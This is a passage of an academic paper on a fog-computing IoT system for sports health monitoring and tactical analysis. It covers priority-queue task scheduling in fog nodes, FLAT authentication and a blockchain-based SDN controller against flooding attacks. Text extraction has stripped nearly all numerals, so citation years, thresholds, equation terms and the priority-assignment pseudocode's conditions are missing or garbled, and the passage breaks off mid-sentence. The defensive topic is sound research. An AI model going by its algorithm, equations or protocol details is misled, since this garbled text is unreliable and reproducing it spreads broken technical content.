/peerj-cs. submitted october accepted november published february corresponding author aykut karakaya, aykut.karakaya@bil.omu.edu.tr academic editor muhammad tariq additional information and declarations can be found on page doi . /peerj-cs. copyright karakaya and akleylek distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:aykut.�karakaya@�bil.�omu.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ fog computing offers decentralized architecture in cloud computing by expanding storage, computing and network resources to the edge of the network to support large-scale iot applications. cloud and fog provide computing, storage, application, infrastructure and data sources (luan et al., ). there are some important differences between them. the main difference is accessibility and proximity. the fog is close to the nodes in the system and is usually located on the local network. cloud, on the other hand, is the server or data center accessed anywhere on the internet. fog extends the cloud using virtualization to create virtual sensors and networks. in other words, fog works like a layer between nodes and the cloud (mukherjee et al., ). it helps with data analysis, data processing and filtering and increases security for sensitive data. while the cloud is more central, the fog works more efficiently in distributed applications. important points in terms of tactical analysis in sports: determining the most appropriate rust analysis, helping coaches in replacement, taking measures against problems that may arise when the tactical order is broken, etc. important point in terms of health is determining the negative health conditions of players and spectators during the match, such as disability. there are studies in the literature for tactical analysis. with voronoi graph and delaunay triangulation, possible pass combinations and analysis of quality pass conditions were created (horton et al., ). detailed data such as how fast, strong, smart for a player was collected and could be analyzed during the match (burn-murdoch, ). some well-known methods are: the shading method that predicts the most probable moves of the players against certain events, the dominant regions method that enables determining the regions where a player can arrive earlier than other players using the voronoi graph (taki & hasegawa, ). related work in a study conducted as a feedback system in sports, data were expanded to examine exercise practices (baca & kornfeind, ). trials were made in table tennis, biathlon and rowing sports. in table tennis, the system detects the effects of the ball on the table in order to determine the accuracy of the shot. in the biathlon, the position of the rifle barrel before and after the shot was analyzed with a laser positioning system. in rowing, the system has been calculated the effort made for rowing. in this study, the system is not flexible, as it depends on sports. in another study, the health status of marathon runners was monitored with a wsn (pfisterer et al., ). data was collected with sensors in runners and analyzed offline in a database. systems that provide video feedback for athletes could also compare athletes (vales-alonso et al., ). however, these studies are not real time. in real-time studies, the perceived data with a wsn monitoring cyclists were compared with predefined datasets and provides feedback to the group of cyclists. the system could tell the cycling group to change their order, divide or increase their speed. environmental data are not taken into consideration in this study. however, environmental factors such as wind speed, temperature and humidity can also affect this situation. in a dynamic study dealing with environmental factors, spline-based numerical karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approach techniques were recommended as a decision making method (vales-alonso et al., ). besides the physical conditions of the athlete, the conditions of the land were also handled and the athlete was guided. the spline approach has been used because some structures such as support vector machine (svm) previously required a lot of data. in this way, multivariate problems could be solved. however, this study has been suggested for training situations in sports such as running and cycling. this method is used for health monitoring and determining the direction of the athlete. the proposed model, besides monitoring the health of players in football, helps the technical team by performing tactical analysis during the match. in kubler et al. ( ), it was shown that the emergency situations obtained from the data in the stadium were transmitted to the health institutions in smart city planning. similarly, it was mentioned that structures that are safe and can detect attacks can be developed. it was emphasized to offer a better sporting event in the world cup. kubler et al. ( ) presents a framework that enables iot service stakeholders to freely join, contribute, and benefit from an open iot ecosystem. in naha et al. ( ), it was mentioned that fog computing based structures will be used a lot in the future and real time application architectures should be developed. it was emphasized that security mechanisms are also very important in the proposed models. in addition, resource allocation is a critical issue in distributed resources such as fog. it was explained that the simultaneous processes should be planned appropriately in the fog layer. in habibi et al. ( ), it was emphasized that architectural design, algorithms and technologies are the top three research subjects. each of these three aspects can be applied in a number of subject areas that are divided into six major categories: computing paradigm, application, software, networking, computing resource management and security. in niu et al. ( ), a task assignment algorithm was proposed for edge calculation. it was emphasized that complexity is difficult to calculate in heuristic approaches, so these approaches should be developed. in iqbal et al. ( ), a task offloading algorithm was proposed. it was explained that the proposed framework can be improved by adding verification mechanisms with blockchain structures. in wazid et al. ( ), the importance of using blockchain-based cloud or fog for a safe health system was emphasized. there are also health monitoring studies applied in hospitals, sports fields or other fields. in ikram, alshehri & hussain ( ), the system that detects conditions such as disability of players and sends them to the coach was recommended. machine to machine (m m) standard was used in this system. also, there were three layers: the detection layer consisting of wireless body area networks (wban), the network layer using zigbee technology and the cloud layer using cloud services to control all data. another health monitoring system that uses fog computing was recommended for hospitals in paul et al. ( ). in this model, data detected using wireless sensor network (wsn) and wban were transmitted to the fog layer. in the fog layer, the data was prioritized and the tasks are distributed appropriately to the fog nodes. thus, more important transactions were given priority. fog computing has some security advantages. however, security operations between the fog and the cloud were provided using the key pair. it was emphasized that the model is partially implemented due to obstacles such as non-existent karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ software and complexity of existing software (paul et al., ). in soni, pal & islam ( ), a three-factor mutual authentication scheme was proposed in wsns for the security of health systems. it provided mutual authentication between a user and the sensor node that is a trusted authority. software defined network (sdn) and network function virtualization (nfv) based structures were used to establish, secure, scale, increase efficiency and reduce the cost of the fog network (krishnan, duttagupta & achuthan, ). sdn covered software-based technologies, models and protocols that make the global network smarter, more abstract and functional. nfv included high-volume structures developed to virtualize network functions and increase network integration. the task of the fog network was to connect each component of the fog layer. it was difficult to manage these networks and achieve sustainable connectivity. sdn and nfv techniques were used for operations that increase the efficiency of the system such as easy management and scalability (yi, li & li, ). each fog node could communicate multi-hop (node-to-node). therefore, each node served as a router in the fog network. sdn was used for efficient routing optimization in the fog platform. hierarchical sdn-based fog architecture studies were carried out on the iot platform in order to enable effective routing of fog nodes (okay & ozdemir, ). nfv separated software from hardware with virtualization to make network functions faster. nfv-based hybrid (cloud and fog) systems were developed to minimize the cost of the network (mouradian et al., ). in madsen et al. ( ), important measurements were made for the service quality of the fog network. these were connectivity, reliability, capacity and latency measurements. the network was expected to be fast and reliable in connectivity measurement. in reliability measurement, it was expected that the data will be transmitted accurately and completely. however, for this, some control operations were applied to the data. this brought additional costs to the system as a delay. in capacity measurement, the network was expected to use bandwidth and storage areas efficiently. therefore, the data was collected, then the computing was made. thus, the cache could be redesigned for other processes (wang et al., ). this process caused delay. in the delay measurement, the nodes were expected to receive a rapid response from the computing and storage processes. with the techniques such as flow mining and complex event processing, delays could be reduced by predicting future operations. interface and programing models were required for iot developers to move their applications to the fog computing platform. dynamic, hierarchical resources were needed to optimize based on these models for components to adapt to these platforms (yi, li & li, ). end nodes could be mobile in iot applications. mobile end nodes created challenges in resource management because bandwidth, storage, computing, delay situations change dynamically. resource management and sharing studies were carried out that properly share heterogeneous resources such as cpu, bandwidth, storage, in the fog layer (liu et al., ). the task scheduling model was recommended for iot applications in the cloud (basu et al., ). a hybrid system has been designed by using the genetic algorithm and the ant colony algorithm together. it was emphasized that the performance increased depending on the karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ number of processors. it was aimed to reduce the processing time of the tasks in the processors rather than the assignment of the tasks to the processors. in kuang et al. ( ), a two-level alternation method framework based on lagrangian dual decomposition was proposed at the lower and upper levels to solve the problems of offloading and resource allocation in mec systems. in zhu et al. ( ), a deadline sensitive mec system with mobile devices sharing multiple heterogeneous mec servers and formulating a minimum energy consumption problem was proposed. in alameddine et al. ( ), a new thoughtful decomposition based on the logic based benders decomposition technique was designed for the resource allocation problem. in rahbari & nickray ( ), the importance of resource allocation and task scheduling in fog-based applications was emphasized. a greedy knapsack-based scheduling algorithm has been proposed to properly allocate resources to modules in the fog network. algorithm simulated with ifogsim. in heydari, rahbari & nickray ( ), it was mentioned that resource management is an np-hard problem to reduce energy consumption in the cloud. fog scheduling structures using the bayesian classification scheduling method were examined. the method was simulated using the ifogsim program and was said to reduce energy consumption and costs in the cloud. in fang et al. ( ), time sharing optimization of communication and computing resources was discussed in order to minimize the total energy consumption of mobile devices in a mobile edge computing (mec) system.an algorithm based on the alternating direction method of multipliers was proposed for energy consumption in mec systems. it was emphasized that these models are simulated and their performance is high. motivation and contribution in this article, secure iot model is proposed to monitor the health of players and spectators, and tactical analysis in the match. in the proposed model, the system becomes more efficient with the help of fog computing. in addition to some security situations of fog computing, there are important features to be achieved such as privacy, confidentiality, authentication, detection of attacks and bandwidth saving, which makes the system safe and fast. thus, their health is monitored by protecting the privacy of players and spectators from third parties. in tactical analysis, two teams are isolated from each other by authentication methods. in the transmission of both requests/ responses sent to end devices, fog computing is faster than cloud computing. also, important processes are processed faster and the delay is effectively reduced with the priority based queue method in fog nodes. thus, the requests with high priority are processed with low latency. in processes that require high processing capacity such as authentication and privacy in the proposed system, bandwidth is saved thanks to implicit certificates. malicious changes are noticed with block chain based sdn controller. data loss is prevented and data integrity is ensured during flooding attack. data stored permanently is encrypted when it is sent from the fog nodes to the cloud. in this article, security problems faced by fog computing systems are also discussed. the measures of our model against these problems are explained. there is also an analysis of our model in terms of safety and effectiveness. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the difference from the similar work in ikram, alshehri & hussain ( ) and soni, pal & islam ( ) is that the fog model is used in the proposed model. thus, responses with low latency are produced. a task management algorithm different from the work in paul et al. ( ) is proposed in fog nodes. in the proposed model based on priority queue and node list, it is aimed to make priority processes with low latency. also, another difference of the proposed model from these studies is the processing of tactical analysis cases as well as the health system. in horton et al. ( ) and taki & hasegawa ( ) included tactical analysis approaches or reviews. no studies on health systems have been conducted. in baca & kornfeind ( ) and pfisterer et al. ( ) were non real time models. in these studies, fog computing was not used and task management mechanism was not recommended. there is no detailed security proof. the proposed model is real-time and includes blockchain-based and lightweight plugins for security principles such as authentication, privacy, integrity. analysis of the model is also included in this article. in addition, in the proposed model, light protocols are used for communication and security. and so the processing load on low power devices is reduced. organization in this article, fog computing and iot based lightweight and safe model are recommended for tactical analysis and health monitoring in sports. in addition, research is made on the features and security principles of the fog computing platform. the following sections of the article include: features and security needs of fog computing in “proposed model”, the details of the proposed model in “analysis of the proposed model”, the security and effectiveness analysis of the proposed model in “simulation of the proposed model”, challenges of wearable technology studies and suggestions for future studies in “challenges in wearable technologies and future works” and conclusion in the last section. fog computing features and security needs this section contains features and security needs of fog computing. it includes the security concept of fog computing and iot protocols used in the proposed model. fog computing is a localized and virtualized platform that provides services such as data processing and storage between end devices and cloud data centers (bonomi et al., ). iot becomes more efficient and more secure with fog computing (abdulkareem et al., ). sensors with restricted resources are used in the iot applications. processes that require large computing such as data processing, storage, and encryption are not usually done by sensors. therefore, there must be a structure that performs these processes. generally, cloud nodes serving as remote servers or fog nodes serving locally are used. fog computing is used to process, store and protect data from sensors without being sent to the cloud. the unsecured internet network is used when sending data to the cloud. if iot devices send the detected data to the cloud, it carries risks such as stealing and modifying the data. in addition, it takes a lot of time to process and store the data. the delay time increases for the response to end devices. since data is processed locally when using fog computing, latency is reduced for response to end devices. also, if the data karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ needs to be sent to the cloud, the data is protected with encryption. it is important to use fog computing in iot applications to increase the performance of the system. a large amount of data is obtained in iot applications. to transfer the data to the cloud, it requires high bandwidth. therefore, analyzing the data in the fog layer and sending only the data to be stored permanently to the cloud reduces the bandwidth (cisco, ). three-layer architecture is commonly used for fog computing. the first layer consists of end devices such as sensor nodes, smart devices, iot supported devices. the second layer consists of fog nodes such as router, gateway, switch, access points. the fog nodes carry out storage and information processing activities. the third layer consists of remote cloud servers. it provides sufficient storage and information processing services (mukherjee et al., ). the data obtained from the end devices (sensors) having the restricted source in the first layer are processed by the fog nodes in the second layer. then, this data is sent either to the cloud in the third layer or to other end devices (smartphone, etc.) in the first layer. thus, latency is reduced and data to the cloud is preserved. important advantages of fog computing (bonomi et al., ): low latency, preprocessing of data to the cloud for permanent storage, and so saving bandwidth, data processing without connecting to the internet, compatible with many sensor nodes, real-time applications can be produced, and sufficient resources for data processing and calculation. due to these advantages, fog computing is used in the tactical analysis and health monitoring model we proposed. security requirements for fog computing in iot applications although fog computing provides some security capabilities to iot systems, it has security and privacy needs against potential threats. the data detected in the end nodes must be protected when transferring between devices. fog computing is an important interlayer between the cloud and the user to reduce latency and protect data. however, the fog is exposed to some threats due to wireless transmission. there are security principles and protocols for this. security concepts of fog computing the security needs in fog computing and the methods used for these needs in the proposed model can be listed as follows (mukherjee et al., ; alrawais et al., ; roman, lopez & mambo, ): � authentication: resource-restricted iot devices cannot perform the encryption required for authentication. for this, it provides the costly storage and data processing needs from outside sources such as fog nodes. users and nodes authenticate in the fog network to get service. authentication is provided in the proposed model with the flat method. � confidentiality: data must be secured during transmission from the iot node to the fog node or from the fog node to the cloud. for secure communication, the iot device communicates with any fog node in the fog network when it needs data processing and storage. since the resources of the end nodes are restricted, lightweight structures are karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ used to secure this communication. therefore, flat method is preferred in the proposed model. in the flat model, fog nodes make all processes that require high computation for security. � malicious and unauthorized nodes prevention: a malicious node in the iot environment leads to the capture, misdirection and replacement of data. when devices on the network cannot mutually verify each other, the attacker can initiate attacks such as rogue gateway, dos (denial of service) and ddos (distributed dos) by continuously sending requests to the fog node. access to the nodes is limited to protect them from malicious nodes. in the proposed model, authentication is provided by flat method. in addition, data integrity is checked with blockchain based sdn structure. � data integrity: in attacks such as man-in-the-middle (mitm), which can occur in fog nodes, data corruption must be perceived by fog because the data must be transmitted to the target node without any disruption. if not transmitted, the fog nodes must perform the predefined processes. in the proposed model, blockchain based sdn controller method is proposed for data integrity. � accessibility: it defines that users can always get service from sources of fog nodes. dos and ddos are some of the attacks that prevent accessibility. these attacks should be prevented. � heterogeneity: data obtained from a large number of devices with different characteristics must be transmitted to the fog nodes. computing and data processing costs increase due to different communication needs. in the proposed model, devices with different features can communicate wirelessly over the zigbee network because they support . .x protocols. � computing cost: fog interlayer is used to reduce latency in iot applications. the fog layer needs computing capacity for processing and storing data, generating real-time responses, encryption, etc. these tasks are difficult to perform on resource-constrained devices. in the proposed model, high computing processes are made in fog nodes. thus, the accessibility of the system is maintained. overview of iot protocols in the iot systems, different lightweight protocols are used together with the tcp/ip protocol set. these protocols provide effective communication for resource-constrained structures. in this section discusses the lightweight protocols used in the proposed model. � the constrained application protocol (coap): it is a web transport protocol that is specialized for use in low power and loss networks with restricted nodes (shelby, hartke & bormann, ). it is defined in rfc . it can work with low power and limited devices up to kib data size and kib code size (bormann, ersue & keranen, ). coap is implemented on udp by default for minimum resource usage. coap has a header structure of bytes (optionally * b) (shelby, hartke & bormann, ). coap consists of layers. it provides low power multicast support. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it can easily interact with http. in the proposed model, coap is used in the communication management of fog nodes and end devices. � zigbee protocol: zigbee is an open and global standard used for wireless personal area networks in low power applications. it can transmit kbit/s at distances up to meters indoors and over meters outdoors. zigbee uses the aes- structure in its standard security mechanism (li, jia & xue, ). in the proposed model, the data obtained from the sensors are transmitted by zigbee networks due to reasons such as the width of the coverage area in the outdoor, low power and supporting a large number of iot nodes. proposed model this section contains overview of the proposed model. it includes task management in the fog nodes, security details. an iot model is proposed on health and tactical analysis monitoring in sports using fog computing. appropriate sensors are placed as a wearable technology for players and spectators. thanks to the data obtained from these sensors, health conditions are monitored and team-based tactical analysis is performed. in addition, environmental factors (temperature, humidity, ball position etc.) are collected from the sensors. the data obtained from the sensors are transmitted locally and wirelessly to the fog nodes in the zigbee network. the data is processed in fog nodes and results are sent to the club doctor and the technical team. since there is a local network, data is transmitted more safely and quickly. the data flow and zigbee structure of the proposed model are shown in fig. . details of the proposed model in the proposed model, data is collected from players or spectators in the sports competition. since the received health data is huge and responses with low latency are required, processing and storing of the data should be done quickly. also, the data obtained from the ball and players are processed with low latency and position analysis should be done. for this reason, fog computing is used in the proposed model. also, if there is data to be stored permanently in the cloud system, the data can be encrypted when it is sent to the cloud via the internet. sensors such as body temperature, pulse, distance and motion, sensitive position, ecg are placed in players. these sensors are found on the player’s clothing or directly on their body, such as wristbands and body bands. in this way, wban are created. in addition, health problems that require first aid that can occur in the spectator are monitored. therefore, it is assumed that this wbans are designed for the spectator as well as the players. these products are difficult to provide as wearable technology is still developing. therefore, wearable technologies are not included in the scope of this article. in this article, a safe fog-based infrastructure is proposed for health and tactical analysis in the field of sports. data flow in fig. : the data obtained from players or spectators with wban are transmitted to fog servers; then the results of the data processed in the fog servers are transmitted to the devices of the technical team and club doctors. the local operation of karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the system reduces latency in data processing and transmission. this helps early treatment if players or spectators are injured. in addition, according to the analysis, it provides the technical team to apply tactical changes early. in order to protect the position and tactical data between the two teams, the nodes of each team must authenticate. data communication of end node devices performing sensing and monitoring is shown in fig. . federated lightweight authentication of things (flat) is used for secure data communication and nodes to recognize each other. in security operations, bandwidth is reduced by using implicit certificates. zigbee network is used to transmit the data figure the data flow and zigbee structure of the proposed model. full-size doi: . /peerj-cs. /fig- figure sensors and their possible locations in system actors. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ obtained from the sensors to the fog nodes. the zigbee network has its own security methods. in addition, block chain based sdn controller mechanism is used for recording transactions and checking data integrity. traditionally, in iot applications that use only cloud, data is sent either without encryption or with encryption on resource-restricted end nodes. this causes either the data to be stolen or the end device to use its resources inefficiently. in the proposed model, security and efficient usage of resources are provided since the detected data is encrypted in the fog nodes and sent to the cloud. in addition, all operations with high computing power in the security phase are performed in the fog nodes. therefore, the proposed model is lightweight and efficient. the layers of the proposed model are given in fig. . � the perception and end node layer consists of sensors used for collecting data and user end devices. � in the middle layer, a network is required to transmit the data to the fog layer. this network is local and uses the zigbee protocol, which allows large amount of devices to communicate. � in the fog layer, data processing and storage are performed by fog nodes. after the data is processed, it is sent to the perception and end node layer or to the cloud layer for permanent storage. data sent to the cloud layer is encrypted in the fog layer due to the insecure internet. � the network layer includes the internet connection between the fog and the cloud layer. this layer exchanges data between the cloud and fog layers. � the cloud layer carries out the permanent storage and processing of data. the data obtained from the sensor and end node layer are sent to the fog nodes in the fog layer via zigbee networks in the middle layer. it is processed in fog nodes after passing through task management processes. there are two cases after the results are obtained. the first case is that the results are sent to the cloud layer via the internet in the network figure data communication of end node devices performing sensing and monitoring. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ layer for permanent storage. the second case is that the results are sent to the sensor and end node layer user devices via zigbee in the middle layer to inform system actors. devices in the sensor and end node layer are in the same layer as they are located in the same area. sensors collect data, while end devices report the result to system actors. task management in the fog nodes fog nodes perform data processing and storage within the local network. the structure of a fog node is shown in fig. . iot systems can generate data frequently and periodically. this data is stored in a compressed form in the data storage. a timestamp is used to determine which iot device the data comes from and when. the communication management transfers the results it receives from the data distribution service to the iot devices through the coap protocol (yoon et al., ). the security management carries out both security of fog and encryption of data to be sent to the cloud. the distributed figure the layers of the proposed model. full-size doi: . /peerj-cs. /fig- figure the structure of a fog node. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ management provides management of data computing processes. the application management provides management of the applications used in the fog. the sdn controller performs control and data integrity processes within the distributed blockchain- based architecture. details of the blockchain based sdn structure used to verify the data and especially prevent flooding attacks are examined in the “security of the proposed model”. in the proposed health and tactical analysis monitoring model, data is exchanged between end nodes, fog and cloud. the tasks that take place in the fog and cloud nodes are shown in fig. . figure shows the main tasks in the fog and cloud, and the path to raw data and result data. these collected data by sensors are sent to the fog layer. after processing in the fog layer, the results are either to the devices of technical team or to the cloud after being encrypted for permanent storage. in fig. , tasks in fog nodes correspond to data preprocessing and validation (v ), data analysis and classification (v ), computing of health data (v ), computing tactical analysis data such as possible pass combinations and quality pass analysis thanks to voronoi graph and delaunay triangulation (v ), encryption and decryption processes for data to and from the cloud (v ), preparation of data to end nodes (v ), preparation of data to the cloud (v ). each eij stands for the relationships and data flow between the i and j tasks. graph covers the processes of classifying, analyzing and sending the results to the end devices or the cloud after the data is perceived. the fog node structure is given in fig. , it has management and storage areas that perform these operations. apart from these, there are also fog servers that act as authentication and identity providers. figure overview of tasks in the fog and cloud. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ iot devices generate a lot of data for real-time processing with low latency tolerance. therefore, task management algorithms are used in fog nodes. the proposed model uses a priority queue based on task management algorithm. the operations in fig. show the priority assignment step of this algorithm (choudhari, moh & moh, ). requests from the end devices arrive at the nearest fog node. there are three queues in the fog node: high (qh), medium (qm) and low (ql). each request (i), is assigned to these queues according to the original priority level of the request (sbcat) and whether the request delay time (or total service time) (delayti ) is between the two thresholds (t and t ). this process is made with the priority assignment algorithm. in the fog nodes, the request delay time (delayti ) of a node request is equal to the difference of the deadline time given by the request and the arrival time to the fog node. the total time (wi) for a request in the fog layer is equal to the sum of the request’s wait time in the queue and the processing time of the request. thus, in accordance with the service level agreement (sla) used in the algorithm, the request (i) must be wi < delay t i to supply the quality of service (qos) requirement. according to the algorithm (choudhari, moh & moh, ); a request (i) is assigned the highest priority queue (qh) if the total service time (delay t i ) of the request from the node is less than or equal to the estimated service time (stiest) of the request (i). otherwise, it is checked whether the total service time of the request is between the threshold values of t and t . if it is within this range, the original priority level of the request (sbcat) is checked. accordingly, the request is assigned to the queue qh or qm or ql. finally, if the delay t i value is greater than t , the requests are forced to be assigned to the queue that matches their original priorities. if the queues are full, they are assigned to a low level queue. thus, higher priority and shorter processes are allowed to be executed. according to the algorithm , the management of fog nodes consists of two steps. in step , each request (reqi) is sent to the fog node (nodedt). nodedt distributes tasks to other fog nodes. each node estimates the total service time from the amount of unused resources. the estimated total service time of node k (stkest) is sent to nodedt. this value is kept in ascending sorted list (lnode) in the nodedt. the list is constantly updated. each reqi is placed in queues according to the algorithm . in step , requests in all queues figure graph of tasks in fog nodes. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are processed in the order of qh, qm, ql. in the lnode list in the nodedt, the request (reqi) is assigned to nodek when the total service time (st k est) of the nodek is equal to or greater than the (delayti ) of the reqi. the loop is broken and the next request is handled. if the reqi is not assigned to any fog node, the lnode is reversed and looped again. if the total time (sum) is greater than or equal to delayti , the reqi is assigned to the group of nodes, and the loop is broken and the next request is handled. otherwise, each value in lnode until that time is summed. lnode(first) is equal to the st last est value before the list is reversed. if the reqi is not assigned to the group of nodes, the fog layer cannot supply with the request. in this case, the queue with the request is based. if the request is in qh or qm queues, it is rejected. if the request is in the ql queue, it can be sent to the cloud because the transmission of data to the cloud increases latency. the parameters and definitions of algorithm are shown in table . equation is used to determine the nodes that supply the reqi request and the limit for the nodes supplying the reqi. algorithm priority assignment algorithm. priority(delayti , st k est) if delayti ≤ st k est then return (h) else if t < delay t i ≤ t then if sbcat = then return (h) else if sbcat = then return (m) else if sbcat = then return (l) else if delayti > t then if sbcat = then if qh is not full then return (h) else return (m) else if sbcat = then if qm is not full then return (m) else return (l) else if sbcat = then return (l) karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ linode � xn k¼ lknode; n � sizeðlnodeÞ; linode � delayti ( ) the total capacity of the resources is determined according to eq. ( ) for each request (lunode, indicates the updated capacity, while l c node indicates the current capacity). algorithm management of fog nodes. step each fog node sends the stkest (for node k) to nodedt nodedt assigns each st k est to the ordered lnode list. foreach reqi do reqi is sent to nodedt (pri) = priority(delay t i , st t est) if pri = h then qhðlastÞ reqi else if pri = m then qmðlastÞ reqi else if pri = l then qlðlastÞ reqi step /* task distribution to fog nodes according to stkest and delay t i */ foreach reqi in qh, qm, ql do for lnode(k) do if stkest � delayti then nodek reqi break if reqi is not assigned to any fog node then reversedlist reverseðlnodeðkÞÞ /* from high to low (processing capacity) */ sum lnodeðfirstÞ for reversedlist do if sum � delayti then lnodeðfirstÞ; lnodeðsecondÞ; …; lnodeðkÞ reqi break else sum sum þlnodeðnextÞ if reqi is not assigned to any fog node group then if (reqi in qh) or (reqi in qm) then reject(reqi) else if reqi in ql then cloud reqi karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lunode ¼ lcnode �linode ( ) after each request is finished, the total capacity of resources is updated according to eq. ( ). lunode ¼ lcnode þlinode ( ) in the big-o complexity analysis for the algorithm , delayti and st i est values are assumed to be calculated. each request takes place in the complexity of o( ). the total complexity for n requests is o(n). in the big-o complexity analysis for the algorithm , step has the o(n) complexity for n requests because it uses the algorithm . in step , the number of requests in each queue to be processed is n, the number of fog nodes is m. the worst case is that the request is not assigned to any fog node. in this case, the worst complexity of step is n · m + m + . the complexity of step and step together is n + n · m + m + . the complexity of the algorithm according to big-o notation is o(n · m). security of the proposed model perceived data is circulated a large number of nodes, such as processing in fog nodes, being sent back to end nodes, and stored in the cloud via the internet. close-distance zigbee networks have security mechanisms such as the aes- encryption method, and the renewal of keys in short periods (li, jia & xue, ). in addition, authentication, data privacy and integrity must be ensured and data must be transmitted encrypted on the internet. therefore, the implicit certificate-based flat method is used for authentication and data privacy in the proposed model (santos et al., ). data integrity is ensured and flooding attacks are detected with block chain based sdn controller. secure communication between fog and cloud is performed by public key cryptography. in the proposed model, the flat method is used for authentication between iot sensors and fog nodes. only the data of legal sensors are taken into fog nodes. if an attacking node successfully passes the flat authentication stage in any way, the data passes through the sdn controller. in this way, a warning is received in unreliable situations. the sdn controller does not warn in reliable situations. the security of the table parameters for the proposed algorithm (algorithm ). parameters definitions qh; qm; ql priority queues reqi request delayti delay cost for i request sttest estimated total capacity of requests in queue stkest estimated service capacity of node k nodedt distributor node lnode capacity list of ordered nodes lknode k.element of the node list nodek k.node karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed model is provided in these two stages. however, in this article, the proposed task management algorithm is simulated. data privacy and authentication federated lightweight authentication of things is used in the proposed model for authentication and privacy. flat is the adaptation of federated identity management (fidm), the cloud authentication system, to fog computing (santos et al., ). fidm performs authentication and encryption processes at high cost. fidm can be used to provide security between cloud and fog. however, authentication and encryption can be done with flat on resource-restricted devices. therefore, flat protocol is used in the proposed model. the flat protocol consists of low computing client, high computing service and identity provider devices. clients are resource-constrained sensor devices and user devices. the service provider (sp) is the fog server. the identity provider (idp), on the other hand, is a server that should work uninterruptedly in the fog network. for the flat protocol, the symmetric key must be preinstalled on the end devices. these keys are created with physical unclonable functions (puf) to be resistant to physical attacks. after the puf output is produced, it is formatted and stored. formatted puf outputs are used to provide trust between end nodes and idp. trust between idp and sp is provided by digital certificates given by a common certification provider. according to fig. (santos et al., ); when the resource-constrained client device wants to access the service, it requests a session key from the idp (in ). idp transmits the session key to the client (in ). idp sends its certificate to sp; the sp sends its certificate to idp (in , and ). after a secure communication channel has been created, idp figure the flat system. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sends the client key to the sp. as with the fidm system, the client requests a confirmation from idp and receives approval (in and ). the client requests service by presenting this confirmation package to sp (in ). sp provides service if the confirmation package is correct (in ). so the identity is verified and the sp starts the service. each sensor placed on players and the sports field must establish a secure session with fog nodes before sending data to fog nodes. for this reason, the flat authentication system is used in the model. the flat system offers a lightweight system for authenticating with resource constrained sensors. the communication of the sensors in the sports field, the identity provider and the service provider on the flat system is shown in fig. . after this process, the task management process starts. in the flat system, both the client and sp must rely on idp. communication between idp and sp takes place using asymmetric key cryptography, while idp-client and sp-client communications take place using symmetric key cryptography. therefore, the flat protocol is more efficient for iot systems using fog computing. to increase the security of the system against attacks (soni, pal & islam, ) authentication method can be used between a user and a node that is a trusted authority. the flat method uses message authentication codes (macs) and digital signature for authentication, symmetric and asymmetric encryption for confidentiality, macs, digital signature and pufs for integrity, authentication of two parties for availability, and the fidm model that limits access to identity for privacy (santos et al., ). security with blockchain based sdn controller blockchain is a storage technology that serves as a registry, allowing the transactions performed in the system to be tracked by each node (nofer et al., ). a blockchain consists of a chain of data packets (blocks) and is expanded with the new block added. therefore, it represents a logbook. fog nodes with blockchain based sdn controllers are used in the fog layer of the proposed model. the structure of the blockchain based sdn controller is shown in fig. (sharma, chen & park, ). this structure is the sdn controller part in the fog node shown in fig. . communication between end devices and fog nodes takes place with the zigbee controller. the zigbee controller is considered a gateway or routing switch for the sdn controller in the fog node. the sdn controller structure consists of three steps (sharma, chen & park, ). � step : the packet parser carries out tracking and parsing operations to identify basic messages from arrived packets. each packet must be captured and parsed to identify abnormal situations. the package parsing phase consists of four messages, features_reply, stats_reply, flow_mod and packet_in. the attacker should capture a subset of these messages 